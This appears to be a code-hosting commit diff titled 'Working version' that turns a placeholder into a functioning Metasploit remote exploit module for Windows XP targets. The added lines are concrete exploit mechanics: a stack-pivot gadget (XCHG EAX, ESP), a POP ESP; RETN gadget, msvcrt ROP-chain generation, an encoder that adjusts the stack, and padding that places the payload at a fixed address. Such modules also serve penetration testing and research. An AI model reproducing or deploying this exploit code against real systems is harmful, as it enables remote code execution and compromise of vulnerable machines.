Working version
parent
c8fd761c53
commit
eddedd4746
|
@ -69,11 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff", # add esp, -80000; popad; popfd
|
||||
'StackAdjustment' => -3500,
|
||||
'BadChars' => "\x00"
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => "process"
|
||||
'ExitFunction' => "process",
|
||||
'PrependMigrate' => true
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
|
@ -134,7 +137,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# Gain control of the call [eax+50h] instruction
|
||||
buf[0x4874, 4] = [0x41424344-0x50].pack('V')
|
||||
# XCHG EAX, ESP; RETN msvcrt
|
||||
buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
|
||||
|
||||
buf
|
||||
end
|
||||
|
@ -147,7 +151,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Target address (200F0700):
|
||||
# 0:000> dd 200f06fc L4
|
||||
# 200f06fc ffffffff 36643ab8 d9c0d946 5af42474
|
||||
p = generate_rop_payload('msvcrt','',{'target'=>'xp'})
|
||||
p = ''
|
||||
p << [0x77c15ed5].pack('V') # XCHG EAX, ESP msvcrt
|
||||
p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
|
||||
p << payload.encoded
|
||||
block = p
|
||||
block << "B" * (1024 - p.length)
|
||||
|
@ -227,7 +233,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mscd << [0x00000002].pack('V')
|
||||
mscd << [0x00000003].pack('V')
|
||||
mscd << [0xfffffffe].pack('V')
|
||||
mscd << [0xffffffff].pack('V') * 52
|
||||
mscd << [0xffffffff].pack('V') * 32 #52
|
||||
mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
|
||||
mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
|
||||
mscd << [0xffffffff].pack('V') * 18
|
||||
mscd << @rop_payload
|
||||
|
||||
mscd
|
||||
|
|
Loading…
Reference in New Issue